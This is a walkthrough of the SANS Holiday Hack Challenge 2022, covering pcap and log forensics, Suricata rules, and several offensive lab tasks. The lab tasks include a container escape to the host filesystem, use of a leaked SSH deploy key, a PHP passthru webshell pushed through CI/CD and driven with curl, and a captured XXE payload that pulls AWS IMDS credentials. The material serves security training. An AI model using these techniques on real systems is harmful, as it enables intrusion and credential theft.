SANS Holiday Hack Challenge 2022 / KringleCon

Table of Contents

Before Starting

Objective 1) KringleCon Orientation

This is the initial tutorial and setup to play the SANS Holiday Hack Challenge.

  • Talk to Jingle Ringford: click on the elf.
  • Get your badge: click on the yellow circles on your avatar.
  • Create a wallet: click on the wallet machine and copy/paste your WalletAddress and Key in a file. KEEP IT!
  • Use the terminal: click the computer terminal, enter answer and press Enter.

You can now enter the challenge by following the path between the Wallet machine and the Cranberry Pie terminal.

Five Rings for the Christmas king immersed in cold

Story

Click on Santa Claus.

Each Ring now missing from its zone

Story

💡 In North Pole: Walk and enter the house with the open door. Enter the Hall of Talks. Go the the extreme left. You will fin a Hidden Chest with 13 KringleCoins and a Hint for the Blockchain Divination Objective. Click Take All Items.

Go right and down the ladder. Then go right and enter the Tolkien Ring room. There will be a Cranberry Pie terminal (Wireshark Phishing).

Objective 2) Recover the Tolkien Ring

Wireshark Practice – Cranberry Pi Terminal Wireshark Phishing (Sparkle Redberry)

Go to the Tolkien Ring room, talk to Sparkle Redberry to download the suspicious.pcap file. Open the suspicious.pcap file in Wireshark. Click on the terminal:

Can you help me? yes
1. There are objects in the PCAP that can be exported by Wireshark and/or Tshark. What type of objects can be exported from this PCAP? HTTP

In Wireshark, click File->Export Objects. Choose HTTP and you can see a list of objects. Click Save All.

2. What is the file name of the largest file we can export? app.php
3. What packet number starts that app.php file? 687

Click on packet 687 to see the IP.

4. What is the IP of the Apache server? 192.185.57.242
5. What file is saved to the infected host? Ref_Sept24-2020.zip

Open the app(1).php file. We can see the filename Ref_Sept24-2020.zip.

6. Attackers used bad TLS certificates in this traffic. Which countries were they registered to?
Israel, South Sudan, United States

Enter tls in display filter. Click Edit->Find packets. Search for string “Server Hello, Certificate”.

Packet 712: Issuer CountryName US (United States)
Packet 808: Issuer CountryName IL (Israel)
Packet 3903: Issuer CountryName SS (South Sudan)
7. Is the host infected (Yes/No)? Yes

Click on Sparkle Redberry. You get hint Event Logs Exposé.

New to Windows event logs? Get a jump start with Eric’s talk!

Talk to Dusty Giftwrap for the next objective.

Windows Event Logs

New to Windows event logs? Get a jump start with Eric’s talk!

Event Logs Exposé Hint from Sparkle Redberry

Download the event_log file from the Objectives menu or use the terminal.

Ready to begin? yes
1. What month/day/year did the attack take place?
12/24/2022
head powershell.evtx.log
2. An attacker got a secret from a file. What was the original file's name?
Recipe.txt
grep .txt powershell.evtx.log
3. The contents of the previous file were retrieved, changed, and stored to a variable by the attacker. This was done multiple times. Submit the last full PowerShell line that performed only these actions.

$foo = Get-Content .\Recipe| % {$_ -replace 'honey', 'fish oil'} $foo | Add-Content -Path 'recipe_updated.txt'
grep -e ".*\$.*=.*" powershell.evtx.log
grep \$foo powershell.evtx.log
4. After storing the altered file contents into the variable, the attacker used the variable to run a separate command that wrote the modified data to a file. This was done multiple times. Submit the last full PowerShell line that performed only this action.

$foo | Add-Content -Path 'Recipe'
grep \$foo powershell.evtx.log
5. The attacker ran the previous command against one file multiple times. What is the name of this file?
Recipe.txt
grep \$foo powershell.evtx.log
6. Were any files deleted? (Yes/No)
Yes
7. Was the original file (from question 2) deleted? (Yes/No)
No
8. What is the Event ID of the logs that show the actual command lines the attacker typed and ran?
4104
# Event ID is in the line before del .\recipe_updated.txt
grep -B100 del powershell.evtx.log
9. Is the secret ingredient compromised (Yes/No)?
Yes
10. What is the secret ingredient?
honey
grep secret powershell.evtx.log

Click on Dusty Giftwrap to get Hints for The Tome of Suricata Rules. We get this link to Suricata rule creation.

Talk to Fitzy Shortstack for the next objective.

Suricata Regatta

Help detect this kind of malicious activity in the future by writing some Suricata rules. Work with Dusty Giftwrap in the Tolkien Ring to get some hints.

  • Rules: “action” “header” “rule options”
  • Actions: alert, pass, drop, reject, rejectsrc, rejectdst, rejectboth.
  • Protocols: tcp, udp, icmp, ip (“all” or “any”), http, ftp, dns, etc.
First, please create a Suricata rule to catch DNS lookups for adv.epostoday.uk.
Whenever there's a match, the alert message (msg) should read Known bad DNS lookup, possible Dridex infection.
Add your rule to suricata.rules

First Rule:

alert dns $HOME_NET any -> any any (msg:"Known bad DNS lookup, possible Dridex infection"; dns.query; content:"adv.epostoday.uk";)
./rule_checker
STINC thanks you for your work with that DNS record! In this PCAP, it points to 192.185.57.242.
Develop a Suricata rule that alerts whenever the infected IP address 192.185.57.242 communicates with internal systems over HTTP.
When there's a match, the message (msg) should read Investigate suspicious connections, possible Dridex infection

Second Rule:

alert http 192.185.57.242 any <> any any (msg:"Investigate suspicious connections, possible Dridex infection"; sid:123;)
./rule_checker
We heard that some naughty actors are using TLS certificates with a specific CN.
Develop a Suricata rule to match and alert on an SSL certificate for heardbellith.Icanwepeh.nagoya.
When your rule matches, the message (msg) should read Investigate bad certificates, possible Dridex infection

Third Rule:

alert tls any any <> any any (msg:"Investigate bad certificates, possible Dridex infection"; tls.cert_subject; content:"heardbellith.Icanwepeh.nagoya"; sid:456;)
./rule_checker
OK, one more to rule them all and in the darkness find them.
Let's watch for one line from the JavaScript: let byteCharacters = atob
Oh, and that string might be GZip compressed - I hope that's OK!
Just in case they try this again, please alert on that HTTP data with message Suspicious JavaScript function, possible Dridex infection

Fourth Rule:

alert http any any <> any any (msg:"Suspicious JavaScript function, possible Dridex infection"; http.accept_enc; http.response_body; content:"let byteCharacters = atob"; sid:789;)
./rule_checker

The first with bread kindly given, not sold

Story

Click on Fitzy Shortstack to complete the objective.

💡 OBJECTIVE COMPLETED

Go in the Elfen Ring room.

Objective 3) Recover the Elfen Ring

Clone with a Difference – Cranberry Pi Terminal Prison Escape (Bow Ninecandle)

Go to the Elfen Room and talk to Bow Ninecandle. See this documentation.

We just need you to clone one repo: git clone git@haugfactory.com:asnowball/aws_scripts.git 
This should be easy, right?

Thing is: it doesn't seem to be working for me. This is a public repository though. I'm so confused!

Please clone the repo and cat the README.md file.
Then runtoanswer and tell us the last word of the README.md file!
git clone https://haugfactory.com/asnowball/aws_scripts.git
tail -n 1 aws_scripts/README.md
runtoanswer
maintainers

Talk to Bow Ninecandle.

When users are over-privileged, they can often act as root. When containers have too many permissions, they can affect the host!

Hint Over-Permissioned from Bow Ninecandle

Were you able to mount up? If so, users’ home/ directories can be a great place to look for secrets…

Hint Mount Up and Ride from Bow Ninecandle

Talk to Tinsel Upatree.

Prison Escape

Greetings Noble Player, 

You find yourself in a jail with a recently captured Dwarven Elf.

He desperately asks your help in escaping for he is on a quest to aid a friend in a search for treasure inside a crypto-mine. 

If you can help him break free of his containment, he claims you would receive "MUCH GLORY!"

Please, do your best to un-contain yourself and find the keys to both of your freedom.
whoami
samways
sudo -l
User samways may run the following commands on grinchum-land:
    (ALL) NOPASSWD: ALL
sudo su -
root

See HackTricks to mount the host filesystem.

fdisk -l
mkdir -p /mnt/escape
mount /dev/vda /mnt/escape
cd /mnt/escape/

Look for keys

cd /mnt/escape/home/jailer/.ssh
cat cat jail.key.priv
082bb339ec19de4935867

Secret: 082bb339ec19de4935867

Talk to Tinsel Upatree for the next objective.

The thing about Git is that every step of development is accessible – even steps you didn’t mean to take! git log can show code skeletons.

Hint Commiting to Mistakes from Tinsel Upatree

If you find a way to impersonate another identity, you might try re-cloning a repo with their credentials.

Hint Switching Hats from Tinsel Upatree

Jolly CI/CD

See Jared Folkins, DevOps Faux Paws | KringleCon 2022.

Greetings Noble Player, 

Many thanks for answering our desperate cry for help!

You may have heard that some evil Sporcs have opened up a web-store selling 
counterfeit banners and flags of the many noble houses found in the land of 
the North! They have leveraged some dastardly technology to power their 
storefront, and this technology is known as PHP! 

***gasp*** 

This storefront utilizes a truly despicable amount of resources to keep the 
website up. And there is only a certain type of Christmas Magic capable of 
powering such a thing… an Elfen Ring!

Along with PHP there is something new we've not yet seen in our land. 
A technology called Continuous Integration and Continuous Deployment! 

Be wary! 

Many fair elves have suffered greatly but in doing so, they've managed to 
secure you a persistent connection on an internal network. 

BTW take excellent notes! 

Should you lose your connection or be discovered and evicted the 
elves can work to re-establish persistence. In fact, the sound off fans
and the sag in lighting tells me all the systems are booting up again right now.  

Please, for the sake of our Holiday help us recover the Ring and save Christmas!

❗ You might need to wait if you get an error when trying to clone.

git clone http://gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git
cd wordpress.flag.net.internal/
git log
git show e19f653bde9ea3de6af21a587e41e7a909db1ca5
commit e19f653bde9ea3de6af21a587e41e7a909db1ca5
Author: knee-oh <sporx@kringlecon.com>
Date:   Tue Oct 25 13:42:54 2022 -0700

    whoops

diff --git a/.ssh/.deploy b/.ssh/.deploy
deleted file mode 100644
index 3f7a9e3..0000000
--- a/.ssh/.deploy
+++ /dev/null
@@ -1,7 +0,0 @@
------BEGIN OPENSSH PRIVATE KEY-----
-b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
-QyNTUxOQAAACD+wLHSOxzr5OKYjnMC2Xw6LT6gY9rQ6vTQXU1JG2Qa4gAAAJiQFTn3kBU5
-9wAAAAtzc2gtZWQyNTUxOQAAACD+wLHSOxzr5OKYjnMC2Xw6LT6gY9rQ6vTQXU1JG2Qa4g
-AAAEBL0qH+iiHi9Khw6QtD6+DHwFwYc50cwR0HjNsfOVXOcv7AsdI7HOvk4piOcwLZfDot
-PqBj2tDq9NBdTUkbZBriAAAAFHNwb3J4QGtyaW5nbGVjb24uY29tAQ==
------END OPENSSH PRIVATE KEY-----
diff --git a/.ssh/.deploy.pub b/.ssh/.deploy.pub
deleted file mode 100644
index 8c0b43c..0000000
--- a/.ssh/.deploy.pub
+++ /dev/null
@@ -1 +0,0 @@
-ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP7AsdI7HOvk4piOcwLZfDotPqBj2tDq9NBdTUkbZBri sporx@kringlecon.com

Copy private key to a file and re-clone the repository.

git show e19f653bde9ea3de6af21a587e41e7a909db1ca5 | grep -A6 "BEGIN OPENSSH PRIVATE KEY" > /home/samways/id_rsa

❗ REMOVE THE HYPHENS AT THE BEGINING OF EACH LINE!

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACD+wLHSOxzr5OKYjnMC2Xw6LT6gY9rQ6vTQXU1JG2Qa4gAAAJiQFTn3kBU5
9wAAAAtzc2gtZWQyNTUxOQAAACD+wLHSOxzr5OKYjnMC2Xw6LT6gY9rQ6vTQXU1JG2Qa4g
AAAEBL0qH+iiHi9Khw6QtD6+DHwFwYc50cwR0HjNsfOVXOcv7AsdI7HOvk4piOcwLZfDot
PqBj2tDq9NBdTUkbZBriAAAAFHNwb3J4QGtyaW5nbGVjb24uY29tAQ==
-----END OPENSSH PRIVATE KEY-----
chmod 600 /home/samways/id_rsa
rm -rf wordpress.flag.net.internal
GIT_SSH_COMMAND='ssh -i /home/samways/id_rsa' git clone ssh://git@gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git

Create a webshell web.php in the wordpress.flag.net.internal directory.

<?php echo "<p>Hacked</p>";?>
<?php passthru($_REQUEST[myprecious]); ?>
git config --global user.name "Hacker"
git add web.php
git commit -m "Adding a webshell"
GIT_SSH_COMMAND='ssh -i /home/samways/id_rsa' git push origin main
curl --head "http://wordpress.flag.net.internal/web.php"
HTTP/1.1 200 OK
Date: Thu, 22 Dec 2022 22:02:13 GMT
Server: Apache/2.4.54 (Debian)
X-Powered-By: PHP/7.4.32
Content-Type: text/html; charset=UTF-8
curl --data "myprecious=whoami" "http://wordpress.flag.net.internal/web.php"
curl --data "myprecious=ls%20/" "http://wordpress.flag.net.internal/web.php"

We find a file called flag.txt!

curl --data "myprecious=cat%20/falg.txt" "http://wordpress.flag.net.internal/web.php"
Congratulations! You've found the HHC2022 Elfen Ring!
oI40zIuCcN8c3MhKgQjOMN8lfYtVqcKT

Another to find ‘ere pipelines get owned

Story

Talk to Rippin Proudboot.

💡 On the Web Ring floor, go to the extreme left. Then go up on the rope and try going left to reach a hidden chest. You will get 25 KringleCoins and a Hint for the Smart Contract Objective. Click Take All Items.

You’re going to need a Merkle Tree of your own. Math is hard. Professor Petabyte can help you out.

Merkle Tree Arboriculture Hint from the Hidden Chest

Objective 4) Recover the Web Ring

Enter the Web Ring room. Talk to Alabaster Snowball.

Naughty IP

Use the artifacts from Alabaster Snowball to analyze this attack on the Boria mines. Most of the traffic to this site is nice, but one IP address is being naughty! Which is it? Visit Sparkle Redberry in the Tolkien Ring for hints.

Download the file and unzip it.

https://storage.googleapis.com/hhc22_player_assets/boriaArtifacts.zip
unzip -d boria boriaArtifacts.zip

NOTE: The victim web server is 10.12.42.16 according to the Wireshark Top Talkers hint from Alabaster Snowball.

  • Open the victim.pcap file with Wireshark.
  • Click on menu Statistics -> Conversations.
  • Click on the IPv4 tab.
  • Click on Bytes to sort the flow with number of bytes. The last address is 18.222.86.32.

Answer: 18.222.86.32

Talk to Alabaster Snowball.

Credential Mining

The first attack is a brute force login. What’s the first username tried?

  • Open the victim.pcap file using Wireshark.
  • In the Display filter bar, add http
  • Click on Edit -> Find Packet…
  • Choose String and enter POST /login.html.
  • Click Find. Packet 7279 is the first packet found.
  • Right-click on packet 7279, Follow -> HTTP Stream. Username is alice.
  • Additionally, searching for string Cookie in packet details, we see packet 9319 with username=bob and password=passw0rd sets the session cookie.
SiteCookie=eyJjb21wYW55IjoiTGVnaXRCcmVhZCIsImxldmVsIjoiYWRtaW4iLCJ1c2VyIjoiYm9iIn0.Yz208Q.Qk0Ek-PErRuhT4s3Be1ArGZKKv4

Answer: alice

404 FTW

The next attack is forced browsing where the naughty one is guessing URLs. What’s the first successful URL path in this attack?

Use the weberror.log file instead of the pcap file. Look for the first 200 OK page after a lot of 404 NOT FOUND.

grep -E "(404|200)+" weberror.log | grep -v /login.html | grep -v /aboutus.html | grep -v "GET / "
...
18.222.86.32 - - [05/Oct/2022 16:47:46] "GET /intro HTTP/1.1" 404 -
18.222.86.32 - - [05/Oct/2022 16:47:46] "GET /account HTTP/1.1" 404 -
18.222.86.32 - - [05/Oct/2022 16:47:46] "GET /x HTTP/1.1" 404 -
18.222.86.32 - - [05/Oct/2022 16:47:46] "GET /42 HTTP/1.1" 404 -
18.222.86.32 - - [05/Oct/2022 16:47:46] "GET /proc HTTP/1.1" 200 -
...

Answer: /proc

IMDS, XXE, and Other Abbreviations

The last step in this attack was to use XXE to get secret keys from the IMDS service. What URL did the attacker force the server to fetch?

  • Open the victim.pcap file using Wireshark.
  • In the Display filter bar, add http
  • Click on Edit -> Find Packet…
  • Choose String and enter /proc.
  • Right-click on packet 26771, Follow -> HTTP Stream. Server response says Post XML here.
  • Replace the search String by POST /proc. Search until the last string is found; it should be packet 32918.
  • Right-click on packet 32918, Follow HTTP Stream.
POST /proc HTTP/1.1
Host: www.toteslegit.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.37) Gecko/20100101 Firefox/12.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: SiteCookie=eyJjb21wYW55IjoiTGVnaXRCcmVhZCIsImxldmVsIjoiYWRtaW4iLCJ1c2VyIjoiYm9iIn0.Yz21Ew.idT7R5CEcAB_uJD221WwmKYG5QM
Content-Type: application/xml
Content-Length: 226

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY id SYSTEM "http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"> ]>
<product><productId>&id;</productId></product>
HTTP/1.1 200 OK
Server: Werkzeug/2.2.2 Python/3.8.10
Date: Wed, 05 Oct 2022 16:48:57 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1595
Connection: close

<html><body>
<pre><product><productId>{
  "Code" : "Success",
  "LastUpdated" : "2022-10-05T16:43:21Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIAV4AVRXQVJ267LD2Q",
  "SecretAccessKey" : "OpGR4v70ygZ3RFf4WTzjNL45pQayRwZgBUgd0LJT",
  "Token" : "IQoJb3JpZ2luX2VjECEaCXVzLWVhc3QtMiJHMEUCIHDsZXiUuHIUrLNH5pAeMiv4aUMVIScjwbo1E9LctQ3rAiEA819eJ24mILbxM3eELK2xrgskHxsRmrza/jIj3y96/sgqsgQI2v//////////ARADGgw0MDM3NzIxMjgyOTgiDMAdG5EGamJ4Z2FwyiqGBPy+CL9AfXIGfLBBDCNkCyl5WOMN7owHr84k+hz4XZYBUp7/+KFZgEiKARroMuD6ofdNRvAj7dQ1/wFxeR6wezUPUkHqtc303oTBY7eTk5EQXClpKsmV1l25QAfD0DOL6FPxpjLPug0AbDFlIhjUeImvk3NBWiUHtXptrJH2ksSaQqU2DBPkkQ4IjMBMbLj0ZdJVWaiUy9sf5ecc2d/qVQU1c6SrYLg0HpyuH9brqm0zuv8/tR17Y/Jo2aNeNGX1wvyb5jP1FcQteypV6IqKIUUCADJ7chYeMypMlwV77phvrZco921O6MV+JlhSIomuzFRLdvzD+RP8DyLZeYZ65vKzr6h0yc+XIHOCT+P01pWQgfZBtvfCJKLKqwTMEbIr/i/xgGmHoCTzx6m38kd4EZvGXZMp3EEasdnqTtKLOR6JFAAlW8SoxOKRL1MshK3SUmYvWnMoLKCotPwyJeAMHEHuZipNMiZ2gbN//PMbUBnPjNVFBP4SfHaTv7EHzHNpTl5toy8qlPyxE0yLbh5a//DF5wJQE6UKfXWlQhk9/NVM7QAAzEzWPiFTp8ajRIDjPoprVlX3yUaTUHOH8PwMtURCJLl0sOQaJtRGWEMrH52ls5e83pm0ta8257vu8HyTR7zgc/7a0ZsoxetlsB7VYIKyXnETO7SMniTO8R/yE1Wn9qAoWp/jMPvn9pkGOo8CLegclGA49hB/LRr/V1bXEyIIRg5Zn93xXvccMX5QyKGVSRghNOVGn/cCglDWc9zSRFRlZ4tHblVi1v8021J04REPR69FDuVvpUzEDJfDF1u4XwYGsp7uuuIngiiegP56H5nSYjmpBfyIURwgNvsz6ptpUvplGCxOvBJcKeyborHJDKG40QRXsLpOgB8NTKhgaFNxO7PjA/YrT7g1rYS7xNrKzVIK4tTwxWB5zN5JAQ3pVRp2JB8Q1ng3qsj3UPfZ3O3JjY4U+rrBKPEHIw9B+Pz6kffOu73aPKgo333w/hd9U4slj74JQXPhO9jCYpAF1bLdS/If20Ed6HvGcAONep0A/FrtZ62EWX4HmeYZ4A==",
  "Expiration" : "2022-10-05T23:00:40Z"
}</productId></product></pre>
</body></html>

Answer: http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance

Talk to Alabaster Snowball for the next objective.

The locks take input, render some type of image, and process on the back end to unlock. To start, take a good look at the source HTML/JavaScript.

Hint Lock Mechanism from Alabaster Snowball

Developers use both client- and server-side input validation to keep out naughty input.

Hint Input Validation from Alabaster Snowball

Understanding how Content-Security-Policy works can help with this challenge.

Hint Content-Security-Policy from Alabaster Snowball

Open Boria Mine Door

Open the door to the Boria Mines. Help Alabaster Snowball in the Web Ring to get some hints for this challenge.

Talk to Hal Tandybuck. Click on the Boria Mine terminal.

Right-click on the application (CAPTCOA) and click Inspect. The locks are in iframes.

First lock

<!-- @&@&&W&&W&&&& -->

Enter @&@&&W&&W&&&& and click Go.

Second lock

<!-- TODO: FILTER OUT HTML FROM USER INPUT -->

Go to W3Schools to experiment with SVG rectangles.

<svg width="200" height="170">
  <rect width="200" height="170" style="fill:rgb(255,255,255);stroke-width:1;stroke:rgb(0,0,0)" />
</svg>

The lock is filled with a white rectangle and unlocks.

Third lock

<!-- TODO: FILTER OUT JAVASCRIPT FROM USER INPUT -->
<svg width="200" height="170">
   <circle cx="100" cy="100" r="200" stroke="blue" stroke-width="4" fill="blue" />
</svg>

The lock is filled with a huge blue circle and unlocks.

Fourth, fifth and sixth locks are optional.

Talk to Hal Tandybuck for the next objective.

Glamtariel’s Fountain

Stare into Glamtariel’s fountain and see if you can find the ring! What is the filename of the ring she presents you? Talk to Hal Tandybuck in the Web Ring for hints.

Talk to Akbowl.